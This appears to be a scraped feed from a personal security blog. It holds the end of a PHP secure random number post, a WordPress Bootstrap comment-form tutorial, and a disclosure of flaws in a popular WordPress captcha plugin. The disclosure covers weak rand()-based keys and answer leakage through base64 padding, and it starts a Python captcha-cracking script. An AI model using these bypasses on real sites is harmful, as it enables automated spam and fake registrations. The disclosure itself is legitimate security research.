<span class="w"> </span><span class="o">$</span><span class="n">num_called</span><span class="o">++</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="n">function</span><span class="w"> </span><span class="n">performance</span><span class="p">()</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="o">//</span><span class="w"> </span><span class="n">My</span><span class="w"> </span><span class="n">appraoch</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">start</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">microtime</span><span class="p">(</span><span class="bp">true</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="o">//</span><span class="w"> </span><span class="n">That</span><span class="w"> </span><span class="k">is</span><span class="w"> </span><span class="n">also</span><span class="w"> </span><span class="n">very</span><span class="w"> </span><span class="n">fast</span><span class="o">!</span><span class="w"></span>
<span class="w"> </span><span class="n">foreach</span><span class="w"> </span><span class="p">(</span><span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="mi">20000</span><span class="p">)</span><span class="w"> </span><span class="k">as</span><span class="w"> </span><span class="o">$</span><span class="n">i</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">secure_rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="mi">200</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">microtime</span><span class="p">(</span><span class="bp">true</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s2">"Elapsed time with secure_random_number(): </span><span class="si">%.6f</span><span class="s2"> seconds"</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="o">$</span><span class="n">start</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="o">//</span><span class="w"> </span><span class="n">With</span><span class="w"> </span><span class="n">rand</span><span class="p">()</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">start</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">microtime</span><span class="p">(</span><span class="bp">true</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">foreach</span><span class="w"> </span><span class="p">(</span><span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="mi">20000</span><span class="p">)</span><span class="w"> </span><span class="k">as</span><span class="w"> </span><span class="o">$</span><span class="n">i</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="mi">200</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">microtime</span><span class="p">(</span><span class="bp">true</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s2">"Elapsed time with rand(): </span><span class="si">%.6f</span><span class="s2"> seconds"</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="o">$</span><span class="n">start</span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="n">test</span><span class="p">(</span><span class="mi">100000000</span><span class="p">,</span><span class="w"> </span><span class="mi">100100000</span><span class="p">);</span><span class="w"> </span><span class="o">//</span><span class="w"> </span><span class="n">Critical</span><span class="w"> </span><span class="n">call</span><span class="o">.</span><span class="w"> </span><span class="n">There</span><span class="s1">'s a high probability that the function will fail.</span>
<span class="n">test</span><span class="p">(</span><span class="mi">500</span><span class="p">,</span><span class="w"> </span><span class="mi">2000000</span><span class="p">);</span><span class="w"></span>
<span class="n">test</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="mi">60</span><span class="p">);</span><span class="w"></span>
<span class="n">performance</span><span class="p">();</span><span class="w"></span>
</code></pre></div>
<p>It essentially prompts for 2^13 random bytes and then splits this blob
of data either in bytes, shorts or longs depending on your specified
range. It then just iterates over these tokens and looks whether we
found a candidate. If not, we call the function again (recursive step).
For further calls, we collect all unused bytes in a look-up table to
avoid making to much calls to the slow <code>openssl_random_pseudo_bytes()</code>
function. This increases performance a bit.</p>
<p>We try to find a random value in the obtained range maximally 50 times.
If we exceed a recursive depth of 50, we just return the weak and
insecure rand(). You can verify with the $secure boolean parameter
whether we found such a candidate securely or if we needed to fall back
to rand().</p>
<p>There is no guarantee that the function will always find a value that
fits, especially in the ranges up to 2^32. If we search for a value in
the range (100000000, 100070000) for instance, we actually look for a
long value that is between 0 and 70000. There are maximally 50<em>2^13/4
long values where we can search such a value (Because we request 8192/4
long values per function call and all in all, we have maximally 50
recursive calls).<br>
But the probability that a single random long value lies in this range
is roughly around <code>1/(2^32/2^16) = 1/(2^16)</code>, which in turn means that
with our 50</em>2^13/4 long values we have a <code>2^16/50*2^13/4 ~= 1:1</code>
chance that we will find one (The calculation is a rough estimate
though).</p>
<p>The worst (rare) case that can happen: You end up using rand(). But as
mentioned, you can check for this (rare) case with the boolean input
parameter...</p>
<p>But in most cases you don't have this concerns and you are good to go!</p>
<p>To finish, here is a picture that illustrates the distribution of
secure_rand() output:</p>
<p>({static}/uploads/2013/11/out.png)]({static}/uploads/2013/11/out.png)
[distribution of secure_rand()]
The output of secure_rand() visualized as points in a canvas.</p>
<script type="text/javascript">if (!document.getElementById('mathjaxscript_pelican_#%@#$@#')) {
var align = "left",
indent = "0em",
linebreak = "false";
if (false) {
align = (screen.width < 768) ? "left" : align;
indent = (screen.width < 768) ? "0em" : indent;
linebreak = (screen.width < 768) ? 'true' : linebreak;
}
var mathjaxscript = document.createElement('script');
mathjaxscript.id = 'mathjaxscript_pelican_#%@#$@#';
mathjaxscript.type = 'text/javascript';
mathjaxscript.src = 'https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.3/latest.js?config=TeX-AMS-MML_HTMLorMML';
var configscript = document.createElement('script');
configscript.type = 'text/x-mathjax-config';
configscript[(window.opera ? "innerHTML" : "text")] =
"MathJax.Hub.Config({" +
" config: ['MMLorHTML.js']," +
" TeX: { extensions: ['AMSmath.js','AMSsymbols.js','noErrors.js','noUndefined.js'], equationNumbers: { autoNumber: 'none' } }," +
" jax: ['input/TeX','input/MathML','output/HTML-CSS']," +
" extensions: ['tex2jax.js','mml2jax.js','MathMenu.js','MathZoom.js']," +
" displayAlign: '"+ align +"'," +
" displayIndent: '"+ indent +"'," +
" showMathMenu: true," +
" messageStyle: 'normal'," +
" tex2jax: { " +
" inlineMath: [ ['\\\\(','\\\\)'] ], " +
" displayMath: [ ['$$','$$'] ]," +
" processEscapes: true," +
" preview: 'TeX'," +
" }, " +
" 'HTML-CSS': { " +
" availableFonts: ['STIX', 'TeX']," +
" preferredFont: 'STIX'," +
" styles: { '.MathJax_Display, .MathJax .mo, .MathJax .mi, .MathJax .mn': {color: 'black ! important'} }," +
" linebreaks: { automatic: "+ linebreak +", width: '90% container' }," +
" }, " +
"}); " +
"if ('default' !== 'default') {" +
"MathJax.Hub.Register.StartupHook('HTML-CSS Jax Ready',function () {" +
"var VARIANT = MathJax.OutputJax['HTML-CSS'].FONTDATA.VARIANT;" +
"VARIANT['normal'].fonts.unshift('MathJax_default');" +
"VARIANT['bold'].fonts.unshift('MathJax_default-bold');" +
"VARIANT['italic'].fonts.unshift('MathJax_default-italic');" +
"VARIANT['-tex-mathit'].fonts.unshift('MathJax_default-italic');" +
"});" +
"MathJax.Hub.Register.StartupHook('SVG Jax Ready',function () {" +
"var VARIANT = MathJax.OutputJax.SVG.FONTDATA.VARIANT;" +
"VARIANT['normal'].fonts.unshift('MathJax_default');" +
"VARIANT['bold'].fonts.unshift('MathJax_default-bold');" +
"VARIANT['italic'].fonts.unshift('MathJax_default-italic');" +
"VARIANT['-tex-mathit'].fonts.unshift('MathJax_default-italic');" +
"});" +
"}";
(document.body || document.getElementsByTagName('head')[0]).appendChild(configscript);
(document.body || document.getElementsByTagName('head')[0]).appendChild(mathjaxscript);
}
</script>Wordpress comment form with bootstrap v3.0.22013-11-08T10:36:00+01:002013-11-08T10:36:00+01:00Nikolai Tschachertag:incolumitas.com,2013-11-08:/2013/11/08/wordpress-comment-form-with-bootstrap-v3-0-2/<p>Hey everybody!</p>
<p>In this short article I will explain how I designed my wordpress theme's
comment section with bootstrap 3.0.2. For the most recent changes, you
find my <a href="https://github.com/NikolaiT/clearcontent/">theme on github</a>. If
you want to see a live demo, just inspect the comment form on this site.
It uses exactly this bootstrap styled form I am discussing here.</p>
<p>In order to follow the content's of this blog post, you should have
basic experience with PHP and HTML/CSS.</p>
<h3>The Problem</h3>
<p>The tricky question here is, whether we can use a action or filter hook
to manipulate the comment form to our liking, or if we have to use and
modify the original <code>comment_form()</code> function directly. Our goal is to
decorate the form with some bootstrap widget classes and use the
bootstrap grid layout. We want to obtain a horizontal form, such as
demonstrated <a href="http://getbootstrap.com/css/#forms-horizontal">here</a>.
After a quick search, I found the function <a href="http://codex.wordpress.org/Function_Reference/comment_form"><code>comment_form( $args,
$post_id);</code></a> in the
wordpress codex. While it looks promising on the first glimpse, some
hindrances become clear after further thinking through. The function's
description says:</p>
<blockquote>
<p>Most strings and form fields may be controlled through the $args
array passed into the function …</p></blockquote><p>Hey everybody!</p>
<p>In this short article I will explain how I designed my wordpress theme's
comment section with bootstrap 3.0.2. For the most recent changes, you
find my <a href="https://github.com/NikolaiT/clearcontent/">theme on github</a>. If
you want to see a live demo, just inspect the comment form on this site.
It uses exactly this bootstrap styled form I am discussing here.</p>
<p>In order to follow the content's of this blog post, you should have
basic experience with PHP and HTML/CSS.</p>
<h3>The Problem</h3>
<p>The tricky question here is, whether we can use a action or filter hook
to manipulate the comment form to our liking, or if we have to use and
modify the original <code>comment_form()</code> function directly. Our goal is to
decorate the form with some bootstrap widget classes and use the
bootstrap grid layout. We want to obtain a horizontal form, such as
demonstrated <a href="http://getbootstrap.com/css/#forms-horizontal">here</a>.
After a quick search, I found the function <a href="http://codex.wordpress.org/Function_Reference/comment_form"><code>comment_form( $args,
$post_id);</code></a> in the
wordpress codex. While it looks promising on the first glimpse, some
hindrances become clear after further thinking through. The function's
description says:</p>
<blockquote>
<p>Most strings and form fields may be controlled through the $args
array passed into the function, while you may also choose to use the
<code>comment_form_default_fields</code> filter to modify the array of default
fields if you'd just like to add a new one or remove a single field.
All fields are also individually passed through a filter of the form
<code>comment_form_field_$name</code> where <code>$name</code> is the key used in the array
of fields.</p>
<p><small>Wordpress codex at
<a href="http://codex.wordpress.org/Function_Reference/comment_form">http://codex.wordpress.org/Function_Reference/comment_form</a></p>
</blockquote>
<p>But there are two html elements in the function that aren't passed
through any filters/actions: The <code><form\></code> element itself (With the
bootstrap comment form applied, the <code><form\></code> element should be <code><form
class="form-horizontal" role="form"\></code>) and the submit button that needs
to be wrapped in the following div element:</p>
<div class="highlight"><pre><span></span><code><span class="nt"><div</span> <span class="na">class=</span><span class="s">"form-group"</span><span class="nt">></span>
<span class="nt"></div></span>
</code></pre></div>
<p>Therefore we can't achieve the bootstrap horizontal comment form with
passing modified <code>$args to comment_form()</code> template.</p>
<h3>A Solution</h3>
<p>My quick & dirty solution was to just copy the <code>comment_form()</code> code from
<a href="http://core.trac.wordpress.org/browser/tags/3.7.1/src/wp-includes/comment-template.php#L1509">comment-template.php</a>,
incorporate it in our theme (within functions.php for example) and then
modify it directly to our liking. I guess that doing so is
controversial, because there might be other ways to style the elements
that aren't affected by any filters. For instance, if we can't modify
the <code><form\></code> attribute with the boostrap class "form-horizontal", we
could alternatively just wrap the whole <code>comment_form()</code> within a div
element of the same class (Not tested if it really works though).</p>
<p>Anyways, my modified <code>comment_form</code> template can be found
<a href="https://github.com/NikolaiT/clearcontent/blob/master/inc/template-tags.php">here</a>
under the name <code>clearcontent_comment_form()</code>.</p>
<p>The solution is not really nice, because it violates the good wordpress
design pattern, namely avoiding duplicate code with hooks. The
disadvantage is the the potential inconsistency with the real
<code>comment_form()</code> code: Whenever wordpress updates, I need to change my
custom <code>comment_form()</code> too in order to make sure the interfaces stays
stable that <code>comment_form()</code> provides. This is very inconvenient to say
the least.</p>A tale of a twofold broken wordpress captcha plugin2013-11-04T02:02:00+01:002013-11-04T02:02:00+01:00Nikolai Tschachertag:incolumitas.com,2013-11-04:/2013/11/04/a-tale-of-a-twofold-broken-wordpress-captcha-plugin/<p><strong>Last Edit (Effective: 7th November 2013)</strong></p>
<p>It seems like the plugin authors updated the security of the plugin. All
the bottom blog entry deals with version 3.8.7. In this new paragraph, I
will look whether these recent updates to version
<a href="http://plugins.svn.wordpress.org/captcha/tags/3.8.8/" title="3.8.8">3.8.8</a>
added the necessary security to prevent conducting an...</p>
<ul>
<li>Attack vector one: Parsing the captcha logic.</li>
<li>Attack vector two: Reversing the decode() function and just reading the solution from the hidden fields.</li>
</ul>
<p>Let's get started:</p>
<p>At line 942 of the <a href="http://plugins.svn.wordpress.org/captcha/tags/3.8.8/captcha.php" title="plugin code">plugin code</a>
(The start of the function that generates the captcha) we see that the
password isn't longer a static clear text password, it is built
dynamically every 24 hours with the function <code>cptch_generate_key()</code>,
that I will show here for your convenience:</p>
<div class="highlight"><pre><span></span><code><span class="x">// Functionality of the captcha logic work for custom form</span>
<span class="x">if ( ! function_exists( 'cptch_display_captcha_custom' ) ) {</span>
<span class="x"> function cptch_display_captcha_custom() {</span>
<span class="x"> global $cptch_options, $cptch_time;</span>
<span class="x"> if ( ! isset( $cptch_options['cptch_str_key'] ) )</span>
<span class="x"> $cptch_options = get_option( 'cptch_options' );</span>
<span class="x"> if ( $cptch_options['cptch_str_key']['key'] == '' || $cptch_options['cptch_str_key']['time'] < time() - ( 24 * 60 * 60 ) )</span>
<span class="x"> cptch_generate_key();</span>
<span class="x"> $str_key = $cptch_options['cptch_str_key']['key'];</span>
</code></pre></div>
<p>Let's see if the new …</p><p><strong>Last Edit (Effective: 7th November 2013)</strong></p>
<p>It seems like the plugin authors updated the security of the plugin. All
the bottom blog entry deals with version 3.8.7. In this new paragraph, I
will look whether these recent updates to version
<a href="http://plugins.svn.wordpress.org/captcha/tags/3.8.8/" title="3.8.8">3.8.8</a>
added the necessary security to prevent conducting an...</p>
<ul>
<li>Attack vector one: Parsing the captcha logic.</li>
<li>Attack vector two: Reversing the decode() function and just reading the solution from the hidden fields.</li>
</ul>
<p>Let's get started:</p>
<p>At line 942 of the <a href="http://plugins.svn.wordpress.org/captcha/tags/3.8.8/captcha.php" title="plugin code">plugin code</a>
(The start of the function that generates the captcha) we see that the
password isn't longer a static clear text password, it is built
dynamically every 24 hours with the function <code>cptch_generate_key()</code>,
that I will show here for your convenience:</p>
<div class="highlight"><pre><span></span><code><span class="x">// Functionality of the captcha logic work for custom form</span>
<span class="x">if ( ! function_exists( 'cptch_display_captcha_custom' ) ) {</span>
<span class="x"> function cptch_display_captcha_custom() {</span>
<span class="x"> global $cptch_options, $cptch_time;</span>
<span class="x"> if ( ! isset( $cptch_options['cptch_str_key'] ) )</span>
<span class="x"> $cptch_options = get_option( 'cptch_options' );</span>
<span class="x"> if ( $cptch_options['cptch_str_key']['key'] == '' || $cptch_options['cptch_str_key']['time'] < time() - ( 24 * 60 * 60 ) )</span>
<span class="x"> cptch_generate_key();</span>
<span class="x"> $str_key = $cptch_options['cptch_str_key']['key'];</span>
</code></pre></div>
<p>Let's see if the new function <code>cptch_generate_key()</code> is sufficiently
random enough. Here is the function code:</p>
<div class="highlight"><pre><span></span><code><span class="x">/* generate key */</span>
<span class="x">if ( ! function_exists( 'cptch_generate_key' ) ) {</span>
<span class="x"> function cptch_generate_key( $lenght = 15 ) {</span>
<span class="x"> global $cptch_options;</span>
<span class="x"> /* Under the string $simbols you write all the characters you want to be used to randomly generate the code. */</span>
<span class="x"> $simbols = get_bloginfo( "url" ) . time();</span>
<span class="x"> $simbols_lenght = strlen( $simbols );</span>
<span class="x"> $simbols_lenght--;</span>
<span class="x"> $str_key = NULL;</span>
<span class="x"> for ( $x = 1; $x <= $lenght; $x++ ) {</span>
<span class="x"> $position = rand( 0, $simbols_lenght );</span>
<span class="x"> $str_key .= substr( $simbols, $position, 1 );</span>
<span class="x"> }</span>
<span class="x"> $cptch_options['cptch_str_key']['key'] = md5( $str_key );</span>
<span class="x"> $cptch_options['cptch_str_key']['time'] = time();</span>
<span class="x"> update_option( 'cptch_options', $cptch_options );</span>
<span class="x"> }</span>
<span class="x">}</span>
</code></pre></div>
<p>Sorry to disappoint, it's still <em>somewhat</em> broken. Let's discuss what
the patch does:</p>
<p>First the author obtains the current site address with
<code>get_bloginfo('url')</code>. The wordpress docs says that this retrieves:</p>
<blockquote>
<p>'url' - Returns the "Site address (URL)" set in Settings > General. This data is retrieved from the "home" record in the wp_options table. Equivalent to home_url().</p>
</blockquote>
<p>This is a world known static value, that is not randomness in ANY
POSSIBLE WAY in the site url! If the plugin is installed on my server,
<code>get_bloginfo('url')</code> would just yield "http://incolumitas.com/". You get
it? It returns the url where wordpress is located :/</p>
<p>Furthermore, the function continues to pick random characters from the
site url and concatenates them to a new string that has default length
of 15. In short: The function just uses 15 random characters from the
seed that is the site url. Well, is this secure?</p>
<p>First of all, <code>rand()</code> is not a secure
<a href="http://en.wikipedia.org/wiki/Pseudorandom_number_generator">PRNG</a>! I
suggest the plugin author strongly to have a glimpse on a recent reddit
netsec post about <a href="http://www.reddit.com/r/netsec/comments/1pvfmv/phps_mt_rand_random_number_generating_function/">that even <code>mt_rand()</code> is a weak
PRNG</a>.</p>
<p>This means that we can find out the state of <code>rand()</code> with sufficiently
enough samples and can therefore predict what characters the <code>rand()</code>
function outputs. But maybe that works not, because the password is only
generated every 24 hours and the "state" of the <code>rand()</code> PRNG changes
faster. I honestly don't know. That being said, there is probably
another way to extract values from <code>rand()</code> through wordpress in order to
obtain enough samples to pursue a cracking attempt. Maybe even by the
captcha math equations themselves, since their randomness relies heavily
on successive calls to rand() [After thinking twice about it: That will
definitely work]. Anyway, I would suggest to use something like the
following to generate the password (Coded quickly by me, so double check
it better!):</p>
<div class="highlight"><pre><span></span><code><span class="x">// Always check if this function returns a str of length 32! If not, don't use it!</span>
<span class="x">if ( ! function_exists( 'cptch_generate_key' ) ) {</span>
<span class="x"> function cptch_generate_key( $length = 32 ) {</span>
<span class="x"> $cstrong = False;</span>
<span class="x"> $bytes = openssl_random_pseudo_bytes($length, $cstrong);</span>
<span class="x"> if ($cstrong == False)</span>
<span class="x"> return False;</span>
<span class="x"> else</span>
<span class="x"> return bin2hex($bytes);</span>
<span class="x"> }</span>
<span class="x">}</span>
</code></pre></div>
<p><strong>Conclusion:</strong></p>
<ul>
<li>The plugin is still vulnerable against captcha parsing (Nothing
changed here). This is the root of the problem.</li>
<li>The plugin still handles it's cryptography pretty badly, but the
randomness might be good enough! (Note that I am from times
meticulous what security things concern).</li>
<li>The whole captcha protection is even in a <em>third</em> way broken.
Consider some captchas that I generated with the plugin:<div class="highlight"><pre><span></span><code>Calculation with timestamp: 1383770422 Encoded pWw= is decoded to 3
Calculation with timestamp: 1383773265 Encoded 3Ko= is decoded to 8
Calculation with timestamp: 1383772504 Encoded tNM= is decoded to 6
Calculation with timestamp: 1383770071 Encoded E08r is decoded to 10
Calculation with timestamp: 1383771712 Encoded VEA= is decoded to 0
Calculation with timestamp: 1383770645 Encoded aWPB is decoded to 16
Calculation with timestamp: 1383773392 Encoded MEa7 is decoded to 42
Calculation with timestamp: 1383772030 Encoded 2uA= is decoded to 4
Calculation with timestamp: 1383770004 Encoded lJ8= is decoded to 7
Calculation with timestamp: 1383770859 Encoded KvE= is decoded to 9
Calculation with timestamp: 1383772789 Encoded k1I= is decoded to 7
Calculation with timestamp: 1383773377 Encoded BAE= is decoded to 6
Calculation with timestamp: 1383770038 Encoded /HY= is decoded to 8
Calculation with timestamp: 1383768565 Encoded nmM= is decoded to 5
Calculation with timestamp: 1383765035 Encoded JPA= is decoded to 6
Calculation with timestamp: 1383770354 Encoded 9EZ3 is decoded to 12
Calculation with timestamp: 1383771119 Encoded KX4= is decoded to 1
Calculation with timestamp: 1383773236 Encoded eSc= is decoded to 7
Calculation with timestamp: 1383770716 Encoded J6w= is decoded to 1
Calculation with timestamp: 1383768040 Encoded fUg= is decoded to 1
Calculation with timestamp: 1383773167 Encoded 7Co= is decoded to 6
Calculation with timestamp: 1383770803 Encoded A3k= is decoded to 1
Calculation with timestamp: 1383771047 Encoded J1Q= is decoded to 8
Calculation with timestamp: 1383768079 Encoded fpg= is decoded to 6
Calculation with timestamp: 1383767787 Encoded uR8= is decoded to 2
Calculation with timestamp: 1383773077 Encoded pgg= is decoded to 4
Calculation with timestamp: 1383772657 Encoded KXI= is decoded to 3
Calculation with timestamp: 1383771187 Encoded Ct0= is decoded to 9
Calculation with timestamp: 1383767982 Encoded Y6U= is decoded to 3
Calculation with timestamp: 1383773155 Encoded 9wpu is decoded to 11
Calculation with timestamp: 1383767071 Encoded ejeX is decoded to 27
Calculation with timestamp: 1383772116 Encoded dWyu is decoded to 15
</code></pre></div>
</li>
</ul>
<p>What do you see? Numeric captcha solutions (The base64 encoded 3-4
char string) smaller than 10, have a encoded value that ends with
the equal sign "=". Hence we could just sketch a little script that
checks whether the hidden field <code>cptch_result</code> ends with a "=". If
this is the case, we just guess the result! That means we can inject
a spammer comment/login attempt/registration in every 10th case (a
little less effectively since we have to discard numbers > 10 [But
there we could also guess a number, just a higher one, there's
finite pool of them]. Assuming that we fire 500 requests a minute,
we can spam the blog with 50 new users or 50 spam comments a minute!
That's not bad for such a simplistic approach :P<br>
This technique bases, yet again, on the bad encode() function.</p>
<h3>Excursus: Could we crack the new function?</h3>
<p>Let's assume that <code>get_bloginfo( "url" ).time();</code> yields something like</p>
<div class="highlight"><pre><span></span><code>http://site.us1383733573
</code></pre></div>
<p>Then the pool of random characters is (Every character only once!)</p>
<div class="highlight"><pre><span></span><code>htp:/sie.u13875
</code></pre></div>
<p>and the number of occurences for every char is:</p>
<div class="highlight"><pre><span></span><code>'h': 1
't': 3
'p': 1
':': 1
'/': 2
's': 2
'i': 1
'e': 1
'.': 1
'u': 1
'1': 1
'3': 3
'8': 1
'7': 2
'5': 2
</code></pre></div>
<p>And of course we all know our maths: The number of combinations is n\^k,
where n is the number of different input characters (The alphabet) and k
is the length of the password.</p>
<p>Hence we need to calculate an average of</p>
<div class="highlight"><pre><span></span><code>n = 15;
k = 15;
number_of_combinations = 15^15
Python:
>>> 15**15
437893890380859375
</code></pre></div>
<p>437893890380859375 is quite a big number. Assuming we have a slow PC and
use <a href="http://hashcat.net/oclhashcat-plus/">hashcat</a>, we can handle 335M
c/s. This means we need 1307145941 seconds to brute force the password.
Of course this "cryptoanalysis" applies only to a somewhat artificial
site url like <em>http://site.us</em>. Nevertheless, this is not secure in terms
of cryptography!</p>
<h3>Excursus: Do we even need to crack the function?</h3>
<p>Due to the implementation of the encode() function, it doesn't matter
how good the password is, since only maximally two bytes of the random
data blob is essentially used in the <em>encrypted</em> value. Just analyze the
encode() function and you will soon realize that every number 0-9 is
xored with a random byte and every number > 10 is xored with two random
bytes...So there is just no need for more than two random bytes :/</p>
<h2>Original blog post</h2>
<h3>Preface (Start of blog post that applies to version 3.8.7)</h3>
<p>Over the years I have seen quite some applications that weren't very
well engineered. Security bugs, cumbersome coding practices and a
missing sense for software architecture to name a few key points. But
there was mostly some reason for the lack of quality. Be it the
inexperience of the authors, the relative novelty of the application or
just laziness. Bad code is not really <em>that bad</em> if it doesn't
compromise the security or usability of the software and does not
jeopardize many users. But apps that compromise both and find themselves
simultaneously in a advanced development stage are really unpleasant to
encounter. (That's my opinion. I think there are also many examples of
my code that lacks security and usability and good coding practices. But
I didn't publish any of my code officially or even distribute it
commercially).</p>
<p>In this blog post I will demonstrate the utter failing of a thousand
line wordpress security plugin that should test to tell computers and
humans apart (CAPTCHA).</p>
<h3>Who is the villain?</h3>
<p><strong>It is <a href="http://wordpress.org/plugins/captcha/">Captcha</a>.</strong></p>
<p>Some basic information about the wordpress plugin (From 03.11.2013):</p>
<table class="table">
<thead>
<tr>
<th>
Affected version
</th>
<th>
Vendor
</th>
<th>
Last Updated
</th>
<th>
Downloads
</th>
<th>
Ratings
</th>
<th>
Downloads yesterday
</th>
</tr>
</thead>
<td>
[3.8.7](http://plugins.svn.wordpress.org/captcha/tags/3.8.7/ "3.8.7")
</td>
<td>
http://bestwebsoft.com/
</td>
<td>
2013-10-31
</td>
<td>
1,187,259
</td>
<td>
4.6 of 5 stars (240 ratings)
</p>
<td>
4,215
</td>
</tr>
</table>
<p>Therefore this plugin is <strong>rather large</strong> and enjoys a ever growing user
base. It is also the very first hit when you type "Captcha" in the
wordpress search form. Maybe because the plugin has the exactly the same
name :/ Anyways, the prominent position is reason enough to investigate
furher.</p>
<p>It's description states euphorically:</p>
<blockquote>
<p>The Captcha plugin allows you to implement a super security captcha
form into web forms. It protects your website from spam by means of
math logic, easily understood by human beings. You will not have to
spend your precious time on annoying attempts to understand
hard-to-read words, combinations of letters or pictures that make your
eyes pop up. All you need is to do one of the three basic maths
actions - add, subtract and multiply. This captcha can be used for
login, registration, password recovery, comments forms.</p>
</blockquote>
<p>That reads very well. Handy math equations, sophisticated protection
from spammers, super security (<a href="http://kryptochef.net/">Cryptochef</a> is
calling)!. No need for hard to decipher captchas! Blame me, I don't
believe it...</p>
<h3>The blackbox approach (Without reading the source)</h3>
<p>How can easy math equations like these</p>
<p><img alt="captcha
1" src="http://s.wordpress.org/plugins/captcha/screenshot-3.jpg?r=798318"><br>
<img alt="captcha
2" src="http://s.wordpress.org/plugins/captcha/screenshot-4.jpg?r=798318"><br>
<img alt="3" src="http://s.wordpress.org/plugins/captcha/screenshot-5.jpg?r=798318"></p>
<p>be immune against common parsing and computational evaluation?</p>
<p>Let's try if we can actually crack them using a little quick & dirty
python script I just coded without even reading the source code further.
You can also investigate my script on my <a href="https://github.com/NikolaiT/Scripts/blob/master/scripts/python/cracking_captcha_plugin/crack.py" title="github account">github
account</a>.
Please note that you have to install the captcha plugin on your
wordpress site and that you need to adjust the links in the script to
point to a existing blog site in order to test that the script solves
the captchas.</p>
<div class="highlight"><pre><span></span><code><span class="c1"># Proofs uselessness of popular captcha plugin for wordpress</span>
<span class="c1"># Software link: http://wordpress.org/plugins/captcha/</span>
<span class="c1"># Modify links to test on your site. You should obviously provide correct URI's</span>
<span class="c1"># and have the plugin installed.</span>
<span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">lxml.html</span>
<span class="kn">import</span> <span class="nn">itertools</span>
<span class="n">N</span> <span class="o">=</span> <span class="p">{</span><span class="s1">'zero'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span><span class="s1">'one'</span><span class="p">:</span> <span class="mi">1</span><span class="p">,</span><span class="s1">'two'</span><span class="p">:</span> <span class="mi">2</span><span class="p">,</span><span class="s1">'three'</span><span class="p">:</span> <span class="mi">3</span><span class="p">,</span><span class="s1">'four'</span><span class="p">:</span> <span class="mi">4</span><span class="p">,</span><span class="s1">'five'</span><span class="p">:</span> <span class="mi">5</span><span class="p">,</span><span class="s1">'six'</span><span class="p">:</span> <span class="mi">6</span><span class="p">,</span><span class="s1">'seven'</span><span class="p">:</span> <span class="mi">7</span><span class="p">,</span><span class="s1">'eight'</span><span class="p">:</span> <span class="mi">8</span><span class="p">,</span><span class="s1">'nine'</span><span class="p">:</span> <span class="mi">9</span><span class="p">,</span><span class="s1">'eleven'</span><span class="p">:</span> <span class="mi">11</span><span class="p">,</span><span class="s1">'twelve'</span><span class="p">:</span> <span class="mi">12</span><span class="p">,</span><span class="s1">'thirteen'</span><span class="p">:</span> <span class="mi">13</span><span class="p">,</span>
<span class="s1">'fourteen'</span><span class="p">:</span> <span class="mi">14</span><span class="p">,</span><span class="s1">'fifteen'</span><span class="p">:</span> <span class="mi">15</span><span class="p">,</span><span class="s1">'sixteen'</span><span class="p">:</span> <span class="mi">16</span><span class="p">,</span><span class="s1">'seventeen'</span><span class="p">:</span> <span class="mi">17</span><span class="p">,</span><span class="s1">'eighteen'</span><span class="p">:</span> <span class="mi">18</span><span class="p">,</span><span class="s1">'nineteen'</span><span class="p">:</span> <span class="mi">19</span><span class="p">,</span> <span class="s1">'ten'</span><span class="p">:</span> <span class="mi">10</span><span class="p">,</span><span class="s1">'twenty'</span><span class="p">:</span> <span class="mi">20</span><span class="p">,</span><span class="s1">'thirty'</span><span class="p">:</span> <span class="mi">30</span><span class="p">,</span>
<span class="s1">'forty'</span><span class="p">:</span> <span class="mi">40</span><span class="p">,</span><span class="s1">'fifty'</span><span class="p">:</span> <span class="mi">50</span><span class="p">,</span><span class="s1">'sixty'</span><span class="p">:</span> <span class="mi">60</span><span class="p">,</span><span class="s1">'seventy'</span><span class="p">:</span> <span class="mi">70</span><span class="p">,</span><span class="s1">'eighty'</span><span class="p">:</span> <span class="mi">80</span><span class="p">,</span><span class="s1">'ninety'</span><span class="p">:</span><span class="mi">90</span><span class="p">}</span>
